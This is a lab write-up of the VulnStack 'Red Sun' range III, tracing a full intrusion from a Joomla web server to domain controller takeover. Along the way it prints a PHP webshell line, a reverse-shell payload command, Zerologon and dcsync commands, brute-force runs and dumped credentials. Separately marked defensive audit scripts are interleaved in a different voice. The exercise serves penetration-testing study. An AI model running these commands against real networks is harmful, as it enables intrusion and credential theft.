Red Sun Targeting Machine (III) Notes

Published: 2024-10-04 20:35:27

VulnStack-Red Sun Target Machine III

Summary

Compared with the previous two range environments, range three is still somewhat harder. There are many rabbit holes, which test how we weigh and try out the information we already have, and how we prioritise during the penetration test. It involved trial and error with database operations, quick learning of a Joomla CVE, PHP disable_functions bypass, weighing Linux kernel privilege escalation options, and getting familiar with the msf framework's modules. It also covered route setup, SOCKS proxy use, SMB brute-forcing, psexec lateral movement, kiwi (mimikatz) use and so on, as well as the powerful crackmapexec tool.

Learning with the masters

Environment Setup

Target machine address:/vuln/detail/5/

After the download completes, we find that all 5 hosts are already running with accounts logged in by default. We need to take a snapshot of the machines first.

Add a host-only VMnet2 network for the 192.168.93.0 segment, with the following settings:

Here the name can only be VMnet2. If you already have a VMnet2, just change its network segment.

On the CentOS host with dual NICs we have to restart the network service after booting, and note the IP address of the bridged NIC for use later:

service network restart

The other four hosts are customized host-only single NIC machines.

Setting a kali host as a bridged NIC

We've finished setting up the environment.

My Kali machine: 192.168.153.37

CentOS: 192.168.153.118, 192.168.93.100

Ubuntu: 192.168.93.120

Win7: 192.168.93.30

Win2012: 192.168.93.10

Win2008: 192.168.93.20

I. nmap scanning

1) Host discovery

 sudo nmap -sn 192.168.153.0/24 -o hosts
MAC Address: 1E:C4:A8:26:3A:B4 (Unknown)
Nmap scan report for 192.168.153.118
Host is up.

We see that 192.168.153.37 is the newly added IP, which should be the CentOS target address.

2) Port scanning

sudo nmap -sT --min-rate 10000 -p- 192.168.153.118 -o ports
Starting Nmap 7.93 (  ) at 2024-10-01 07:00 CST
Nmap scan report for 192.168.153.118
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds

3) Detailed information scanning

sudo nmap -sT -sV -sC -p22,80,3306 -O 192.168.153.118 -o details
Nmap scan report for 192.168.153.118
Host is up (0.00020s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 2584c6cc2c8a7b8f4a7c60f1a3c9b022 (DSA)
|_  2048 58d14c592d85ae0769240add720f45a5 (RSA)
80/tcp   open  http    nginx 1.9.4
3306/tcp open  mysql?
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.|
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Tue Oct  1 07:07:26 2024 -- 1 IP address (1 host up) scanned in 243.25 seconds

4) Default Script Scanning

sudo nmap --script=vuln -p22,80,3306 192.168.153.118 -o vuln
Starting Nmap 7.93 (  ) at 2024-10-01 07:11 CST
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 84.04% done; ETC: 07:12 (0:00:06 remaining)
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.40% done; ETC: 07:12 (0:00:04 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.90% done; ETC: 07:12 (0:00:04 remaining)
Nmap scan report for 192.168.153.118
Host is up (0.00018s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 333.79 seconds

Seeing that SSH and MySQL are exposed, we can first check for weak passwords:

hydra -C /usr/share/wordlists/legion/ mysql://192.168.153.118

Saw a set of weak passwords for mysql.

II. mysql penetration (failed)

mysql -u root -h 192.168.153.118  -p123

MySQL [(none)]> show variables like '%secure%';
+--------------------------+-------+
| Variable_name            | Value |
+--------------------------+-------+
| require_secure_transport | OFF   |
| secure_auth              | ON    |
| secure_file_priv         |       |
+--------------------------+-------+
3 rows in set (0.028 sec)

We see that secure_file_priv is empty, which we already met in Red Sun Target I. Try writing a webshell to get an initial foothold.

MySQL [(none)]> show variables like '%general%';
+------------------+---------------------------+
| Variable_name    | Value                     |
+------------------+---------------------------+
| general_log      | OFF                       |
| general_log_file | /var/lib/mysql/ |
+------------------+---------------------------+
2 rows in set (0.002 sec)

MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.017 sec)

Having gotten this far, we run into a problem: we don't have the absolute path of the web directory.

Look at the web service for any information about this.

Try directory brute-forcing (of course, go through the site's default pages on port 80 first):

sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2. --hide-length 172

This run didn't find the information we were looking for, so we can specify extensions to get a broader and more precise attack surface:

sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2. -b 404,502 -x php,zip,tar,txt

It is also worth trying several different brute-forcing tools; they use different wordlists and algorithms and can turn up unexpected gains:

 -u http://192.168.153.118

Of course, we have to be as thorough as possible with directory brute-forcing. Try not to lose the easiest and most effective penetration path for yourself because you didn't collect information properly.

Eventually we found it: the ~ file contains the absolute path we want.

With this information it is reasonable to assume that the absolute path is /var/www/html. We also get a windfall here: a set of user credentials.

testuser:cvcvgjASD!@ With these credentials we can try password reuse.

1) Try into outfile

Prerequisite:

  • secure_file_priv is empty. This means MySQL can write files to any location the server process is allowed to write to.

Going back to MySQL, let's try to execute:

MySQL [(none)]> select "<?php system($_GET[cmd]); ?>"  into outfile "/var/www/html/";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/' (Errcode: 13 - Permission denied)

We see Permission denied (Errcode 13 is an operating-system permission error, so the MySQL server process is not allowed to write there). There seems to be some internal security policy; this route won't work.

2) Try log writing

We set the log output location to /var/www/html/

MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.001 sec)

MySQL [(none)]> set global general_log_file="/var/www/html/";
ERROR 29 (HY000): File '/var/www/html/' not found (Errcode: 13 - Permission denied)
MySQL [(none)]> show variables like '%general%';
+------------------+--------------------------+
| Variable_name    | Value                    |
+------------------+--------------------------+
| general_log      | OFF                      |
| general_log_file | /var/www/html/ |
+------------------+--------------------------+
2 rows in set (0.001 sec)

As you can see, logging was turned on, but changing the log path produced an error.

Checking the logging configuration again: although the path was changed successfully, logging was also switched off in the process.

This route is also a failure.
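
Both MySQL routes above failed only because of filesystem permissions, not because the server was configured safely. As an added hardening check (my own example, not part of this writeup), the script below parses the mysql client's SHOW VARIABLES tables and flags the two settings the attempts relied on: an empty secure_file_priv, and a general log switched on and pointed at a web-served directory. The sample table is constructed; the list of web-root prefixes is an assumption to adapt to your deployment.

```python
"""Audit MySQL file-write settings: an added hardening check, not part of the writeup.

It parses the ASCII tables the mysql client prints for SHOW VARIABLES and flags the
two settings the writeup relied on: an empty secure_file_priv and a general log that
can be pointed at a web-served directory.
"""
import re

# Constructed sample: output of `SHOW VARIABLES LIKE '%secure%'` followed by
# `SHOW VARIABLES LIKE '%general%'`, with a deliberately weak general_log_file.
SAMPLE_OUTPUT = """\
+--------------------------+-------+
| Variable_name            | Value |
+--------------------------+-------+
| require_secure_transport | OFF   |
| secure_auth              | ON    |
| secure_file_priv         |       |
+--------------------------+-------+
+------------------+---------------------------+
| Variable_name    | Value                     |
+------------------+---------------------------+
| general_log      | ON                        |
| general_log_file | /var/www/html/log.php     |
+------------------+---------------------------+
"""

# Assumed web roots: a log written under one of these becomes reachable over HTTP.
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/html/")

ROW_RE = re.compile(r"^\|\s*(\S+)\s*\|\s*(.*?)\s*\|$")


def parse_variables(text):
    """Turn mysql-client table rows into a {variable_name: value} dict."""
    variables = {}
    for line in text.splitlines():
        match = ROW_RE.match(line)
        if match and match.group(1) != "Variable_name":
            variables[match.group(1)] = match.group(2)
    return variables


def audit(variables):
    """Return a list of (variable, finding) tuples; an empty list means nothing to fix."""
    findings = []
    # Empty string means "no restriction"; NULL disables import/export entirely.
    if variables.get("secure_file_priv") == "":
        findings.append(("secure_file_priv",
                         "empty: LOAD DATA / SELECT ... INTO OUTFILE may touch any path the "
                         "server process can access; set it to a dedicated directory or NULL"))
    if variables.get("general_log", "OFF").upper() == "ON":
        log_file = variables.get("general_log_file", "")
        if log_file.startswith(WEB_ROOTS):
            findings.append(("general_log_file",
                             f"{log_file} is under a web root: query text (PHP tags included) "
                             "would be served as a file; move the log out of the web root"))
        else:
            findings.append(("general_log",
                             "ON: the general log records every statement, credentials "
                             "included; keep it off outside debugging"))
    return findings


if __name__ == "__main__":
    for variable, finding in audit(parse_variables(SAMPLE_OUTPUT)):
        print(f"[!] {variable}: {finding}")
```

Run it against the real output of SHOW VARIABLES LIKE '%secure%' and '%general%'. The fix for the first finding goes in my.cnf, because secure_file_priv is read-only at runtime and only takes effect after a server restart.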

III. Web penetration

We did the directory brute-forcing above and clicked through everything it found.

We find that this is a Joomla CMS, which had an unauthenticated vulnerability that can be chained to RCE:

cve-2023-23752:/blog/joomla-for-rce#cve-2023-23752-to-code-execution-1

Anyone who wants to read more can follow that article; here I'll walk through the operation for this range.

Found the default page, and the backend administration page/administrator

We can rummage around in the database to see whether there are any user credentials.

Go to the joomla database, where you will see the am2zu_users table.

List the column names, a query we commonly use during manual SQL injection:

select column_name from information_schema.columns where table_name="am2zu_users" and table_schema="joomla";
+---------------+
| column_name   |
+---------------+
| id            |
| name          |
| username      |
| email         |
| password      |
| block         |
| sendEmail     |
| registerDate  |
| lastvisitDate |
| activation    |
| params        |
| lastResetTime |
| resetCount    |
| otpKey        |
| otep          |
| requireReset  |
+---------------+
16 rows in set (0.006 sec)

Query the username and password:

MySQL [joomla]> select id,name,username,password from am2zu_users;
+-----+------------+---------------+---------------------------------------------------
| id  | name       | username      | password                                           
+-----+------------+---------------+---------------------------------------------------
| 891 | Super User | administrator | $2y$10$t1RelJijihpPhL8LARC9JuM//XycrybdRbk8IEg6Dze2 |
+-----+------------+---------------+---------------------------------------------------
1 row in set (0.001 sec)

Credentials: administrator:$2y$10$t1RelJijihpPhL8LARC9JuM//XycrybdRbk8IEg6Dze2

1) Cracking passwords

Try to crack it with hashcat.

hashcat creds /usr/share/wordlists/ --username -m 3200 
hashcat creds /usr/share/wordlists/ --username -m 3200 --show

It didn't work.

2) Change password

The official Joomla documentation shows how to reset the administrator password.

Documentation:/How_do_you_recover_or_reset_your_admin_password%3F

Following its Method 2, we reset the password:

update am2zu_users set password = "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199" where username="administrator";

According to the documentation, this changes the credentials to administrator:secret
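
The reset above works by writing a legacy md5:salt value straight into the users table, which is exactly the trace a defender can look for. As an added integrity check (my example; neither the writeup's nor Joomla's code), the script below classifies each stored hash and flags rows carrying a legacy-format hash or the exact value from the public reset instructions. The sample rows are constructed; the bcrypt string is a placeholder of the right shape, not a real hash; the format patterns are my reading of Joomla's documented hashing schemes.

```python
"""Audit Joomla user password hashes: an added integrity check, not from the writeup or Joomla.

Joomla 3.2+ stores bcrypt hashes; the older md5:salt format only survives until the
user next logs in. A Super User row that suddenly carries a legacy-format hash, or the
exact value from the public reset instructions, is a sign of a direct database write.
"""
import hashlib
import re

# Assumed formats: bcrypt ($2y$cost$ + 53 chars) and legacy md5hex:32-char salt.
BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")
LEGACY_RE = re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]{32}$")

# The md5:salt value published in Joomla's password-recovery documentation ("secret").
DOCUMENTED_RESET_HASH = "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199"

# Constructed sample rows (id, username, password) in the shape of am2zu_users;
# the bcrypt string is a placeholder of the right shape, not a real hash.
SAMPLE_USERS = [
    (891, "administrator", DOCUMENTED_RESET_HASH),
    (892, "editor", "$2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"),
    (893, "legacyuser", "0" * 32 + ":" + "a" * 32),
]


def classify(stored):
    """Name the hash format: 'bcrypt', 'legacy_md5_salt' or 'unknown'."""
    if BCRYPT_RE.match(stored):
        return "bcrypt"
    if LEGACY_RE.match(stored):
        return "legacy_md5_salt"
    return "unknown"


def legacy_hash(password, salt):
    """Joomla's pre-3.2 scheme: md5(password + salt), then ':' and the salt."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def legacy_matches(stored, password):
    """True if a legacy-format stored value was produced from `password`."""
    if classify(stored) != "legacy_md5_salt":
        return False
    _, salt = stored.split(":", 1)
    return legacy_hash(password, salt) == stored


def audit_users(rows):
    """Return (user_id, username, reason) for rows that deserve a look."""
    findings = []
    for user_id, username, stored in rows:
        kind = classify(stored)
        if stored == DOCUMENTED_RESET_HASH or legacy_matches(stored, "secret"):
            findings.append((user_id, username,
                             "password equals the documented reset value: reset it and review database access"))
        elif kind == "legacy_md5_salt":
            findings.append((user_id, username,
                             "legacy md5:salt hash where bcrypt is expected: check for direct database edits"))
        elif kind == "unknown":
            findings.append((user_id, username, "unrecognised hash format"))
    return findings


if __name__ == "__main__":
    for user_id, username, reason in audit_users(SAMPLE_USERS):
        print(f"[!] {user_id} {username}: {reason}")
```

Feed it the id, username and password columns of the users table on a schedule; on a long-running Joomla 3.2+ site every active account should classify as bcrypt, so each legacy-format row needs an explanation.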

3) Beginning of infiltration

Login succeeded; find Templates.

Add Code

Access it:

curl -X POST -d "cmd=phpinfo();" -u "administrator:secret" http://192.168.153.118/templates/beez3/ > 
xdg-open  

We see that the target's PHP has disable_functions configured, which disables many of the functions used for code execution.

III. Gaining a foothold

We need to bypass disable_functions. There are many ways to do this; here we use AntSword's plugin.

Options to bypass disable_functions

Select PHP7_UserFilter for bypassing

The command executes normally, but the ip a command shows that this is the 192.168.93.120 machine; this should be because the target machine is proxying to it.

On 192.168.93.120 we rummage through the more sensitive files and folders.

Found /tmp/mysql/

We see a set of credentials, wwwuser:wwwuser_123Aqx. Try password reuse: log in over SSH.

sudo ssh [email protected] -o HostKeyAlgorithms=+ssh-rsa

Interface  3
============
Name         : eth1
Hardware MAC : 00:0c:29:32:46:d3
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.93.100
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe32:46d3
IPv6 Netmask : ffff:ffff:ffff:ffff::

Gained normal user privileges on 192.168.153.118.

We now have normal user privileges on both Linux machines, and 192.168.153.118 is a dual-NIC machine whose other NIC is 192.168.93.100.

IV. Linux privilege escalation

Because this is a target machine, it is recommended to take a snapshot before attempting privilege escalation, so that an attempt that crashes the system can be reverted.

Because we want to go further into the intranet and both Linux machines have relatively low privileges, we need to escalate to make subsequent penetration easier.

Looking through the sudo and SUID information, there are no commands that can be used for escalation.

[wwwuser@localhost /]$ uname -a
Linux  2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

We find that the kernel of 192.168.153.118 is 2.6.32; we can search searchsploit for historical vulnerabilities:

searchsploit kernel | grep 2.6.32

Not many; we can try them in turn.

1) 9844 (Failure)

python 
[+] PID.
sh: /proc//fd/1: There is no such file or directory
[+] PID.
sh: /proc//fd/1: no such file or directory

2) 10018 (Failure)

3) 25444 (Failed)

4) 24459 (Failed)

This one requires running su - and entering the correct root password to complete the escalation, so it does not help us.

5) dirtycow (success)

Those familiar with the Dirty Cow vulnerability (CVE-2016-5195) will recognise 2.6.32 as a sensitive version, because it falls within Dirty Cow's affected range.

searchsploit dirty cow -m 40839

Escalated to root.
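
Whether a CentOS 6 host is exposed to Dirty Cow comes down to its kernel build number, which is what the uname line above gives away. As an added patch-level check (my example, not part of the writeup), the script below pulls the release string out of uname -a and compares the el6 build against the fixed build. The fixed build assumed here, 2.6.32-642.6.2.el6, is the kernel I recall Red Hat shipping for CVE-2016-5195 on EL6; confirm it against the vendor advisory before relying on it. The uname sample is constructed in the shape of the page's output.

```python
"""Check an EL6 kernel release against the Dirty Cow (CVE-2016-5195) fix.

Added patch-level check, not part of the writeup. The fixed build below is an
assumption from memory of the Red Hat advisory; verify it before relying on it.
Kernels from other families are reported as unknown rather than guessed.
"""
import re

FIXED_EL6_BUILD = (2, 6, 32, 642, 6, 2)  # assumed fixed kernel: 2.6.32-642.6.2.el6

# Constructed sample in the shape of `uname -a` on the writeup's CentOS host.
SAMPLE_UNAME = ("Linux localhost 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 "
                "x86_64 x86_64 x86_64 GNU/Linux")

RELEASE_RE = re.compile(r"\b(\d+\.\d+\.\d+-[0-9.]+\.el\d+(?:\.\w+)?)")
EL_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-([\d.]+)\.el(\d+)")


def parse_release(uname_line):
    """Pull the kernel release (e.g. 2.6.32-431.el6.x86_64) out of `uname -a` output."""
    match = RELEASE_RE.search(uname_line)
    return match.group(1) if match else None


def el_build_tuple(release):
    """Split '2.6.32-642.6.2.el6.x86_64' into (comparable tuple, el_major), or None."""
    match = EL_RE.match(release)
    if not match:
        return None
    base = tuple(int(x) for x in match.group(1, 2, 3))
    build = [int(x) for x in match.group(4).split(".")]
    build += [0] * (3 - len(build))          # '431' compares as 431.0.0
    return base + tuple(build[:3]), int(match.group(5))


def dirtycow_status(release):
    """'vulnerable', 'patched' or 'unknown' for the given kernel release string."""
    parsed = el_build_tuple(release)
    if parsed is None or parsed[1] != 6:
        return "unknown"              # only the EL6 fixed build is encoded here
    build, _ = parsed
    return "vulnerable" if build < FIXED_EL6_BUILD else "patched"


if __name__ == "__main__":
    release = parse_release(SAMPLE_UNAME)
    print(f"{release}: {dirtycow_status(release)}")
```

uname reports the running kernel, so a host with the fixed package installed but not yet rebooted into still shows as vulnerable, which is the answer that matters. To cover other families, add their fixed builds from the corresponding advisories rather than extending the comparison by guesswork.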

V. Intranet penetration

1) Getting a session in msf

The msf framework integrates many functions such as privilege escalation, credential dumping, port scanning and SOCKS proxying, which makes subsequent intranet penetration easier.

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.153.37 lport=4444 -f elf > 

Successfully got a session in msf.

2) Add intranet routing

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/manage/autoroute 
msf6 post(multi/manage/autoroute) > show options 
msf6 post(multi/manage/autoroute) > set subnet 192.168.93.0
subnet => 192.168.93.0
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run

[*] Running module against 
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.93.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.153.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

3) Preliminary Intranet Detection

use auxiliary/scanner/discovery/udp_probe     

msf6 auxiliary(scanner/discovery/udp_probe) > set rhosts 192.168.93.2-254
rhosts => 192.168.93.2-254
msf6 auxiliary(scanner/discovery/udp_probe) > set threads 5
threads => 5
msf6 auxiliary(scanner/discovery/udp_probe) > run

We discover three machines: 192.168.93.10, 192.168.93.20 and 192.168.93.30.

4) socks proxy configuration

use auxiliary/server/socks_proxy 
msf6 auxiliary(server/socks_proxy) > exploit -j
[*] Auxiliary module running as background job 3.

[*] Starting the SOCKS proxy server

Install proxychains:

sudo apt install proxychains

Edit the proxychains configuration file (under /etc/) and change the proxy entry to 127.0.0.1 1080.

5) Host detailed port scanning

192.168.93.10

# Nmap 7.93 scan initiated Thu Oct  3 17:41:30 2024 as: nmap -o 10_win 192.168.93.10
Nmap scan report for 192.168.93.10
Host is up (1.1s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

192.168.93.20

# Nmap 7.93 scan initiated Thu Oct  3 17:42:21 2024 as: nmap -o 20_win 192.168.93.20
Nmap scan report for 192.168.93.20
Host is up (0.0030s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
2383/tcp  open  ms-olap4
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49158/tcp open  unknown

192.168.93.30

# Nmap 7.93 scan initiated Thu Oct  3 17:40:44 2024 as: nmap -o 30_win 192.168.93.30
Nmap scan report for 192.168.93.30
Host is up (0.0022s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown

Seeing that port 445 is open, try brute-forcing the SMB service.

hydra

proxychains hydra -l administrator -P '/usr/share/seclists/Passwords/' smb://192.168.93.30

Of course you can also use crackmapexec or msf's smb module.

crackmapexec

proxychains crackmapexec smb 192.168.93.30 -u administrator -p '123qwe!ASD' --local-auth

msf

use auxiliary/scanner/smb/smb_login 

msf6 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/seclists/Passwords/
pass_file => /usr/share/seclists/Passwords/
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.30:445     - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:/root/',
[!] 192.168.93.30:445     - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:123456',
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:password',
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:12345678',
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:1234',
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:pussy',
[+] 192.168.93.30:445     - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.30:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.93.30:445     - Bruteforce completed, 1 credential was successful.
[*] 192.168.93.30:445     - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed

Brute-forced credentials: administrator:123qwe!ASD. We can log in to the SMB service.

6) Lateral movement via SMB

use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.30
rhost => 192.168.93.30
msf6 exploit(windows/smb/psexec) > set smbuser administrator                  
smbuser => administrator         
msf6 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD                     
smbpass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > run

Successfully got a session in msf via SMB, with SYSTEM privileges.

Trying password reuse here also reveals that 192.168.93.20 uses the same password:

msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf6 exploit(windows/smb/psexec) > run

[*] 192.168.93.20:445 - Connecting to the server...
[*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'...
[*] 192.168.93.20:445 - Selecting PowerShell target
[*] 192.168.93.20:445 - Executing the payload...
[+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.20:4444
[*] Sending stage (201798 bytes) to 192.168.93.20
[*] Meterpreter session 8 opened (192.168.93.100:54281 -> 192.168.93.20:4444 via session 2) at 2024-10-04 09:06:57 +0800

meterpreter > 

Domain information can be seen in systeminfo.

Ping it.

C:\Windows\system32>ping 
ping 

Pinging  [192.168.93.10] with 32 bytes of data:
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.93.10:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

The domain controller should be 192.168.93.10.

net view

You can see the three hosts in the domain

7) Lateral movement to the domain controller

Check for the Zerologon vulnerability:

meterpreter > load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords
meterpreter > kiwi_cmd lsadump::zerologon /target: /account:WIN-8GA56TNV3MV$

target

meterpreter > kiwi_cmd lsadump::zerologon /target: /account:WIN-8GA56TNV3MV$ /exploit

The attack succeeded; dump the hashes:

kiwi_cmd lsadump::dcsync /domain: /dc: /user:administrator /authuser:WIN-8GA56TNV3MV$ /authdomain:test /authpassword:"" /authntlm

Credentials:
Hash NTLM: 18edd0cc3227be3bf61ce198835a1d97
ntlm-0: 18edd0cc3227be3bf61ce198835a1d97
ntlm-1: c703941f8ce69a643264ac6f87955b2b
ntlm-2: 2bc31ee9ab29514308035203e98a727c
lm0: 9f8f8b3a6b02ebbc48586f9995cc6b69
lm-1: be62fe8aef5763fe44c55c5308ab9597

We see that the domain controller's administrator NTLM hash is 18edd0cc3227be3bf61ce198835a1d97

Finally, restore the domain controller's machine account password to prevent the domain controller from breaking.

kiwi_cmd lsadump::postzerologon /target: /account:WIN-8GA56TNV3MV$

8) Pass-the-hash attack (failed)

meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK 
meterpreter > kiwi_cmd sekurlsa::pth /user:administrator /domain: /ntlm:18edd0cc3227be3bf61ce198835a1d97

Failed here.

9) Grab credentials from Win2008

We tried password reuse above and found that the 2008 password is the same as Win7's: 123qwe!ASD

Run in meterpreter on 2008:

meterpreter > load kiwi
meterpreter > creds_all

We see that:

There is a plaintext password for the domain controller there.

Here my machine's msf could not log in to the domain controller.

10) Verify with crackmapexec

proxychains crackmapexec smb 192.168.93.10 -u administrator -p 'zxcASDqw123!!'  

Seeing success, we can access the domain controller.

Summary

Through nmap scanning we found a CentOS web machine exposed to the public. After trial and error with MySQL getshell, and by exploiting the public Joomla vulnerability CVE-2023-23752 and bypassing disable_functions on the web side, we gained a foothold on another Ubuntu machine; looking for information on Ubuntu, we found CentOS credentials and used the Dirty Cow vulnerability to escalate to root.

Using the dual-NIC CentOS machine we set up routing and a proxy, moved laterally into the intranet, brute-forced the SMB service to get the Win7 password credentials, reused the password to get a shell on the Server 2008 machine, captured passwords with mimikatz on 2008, and ultimately took down the domain controller!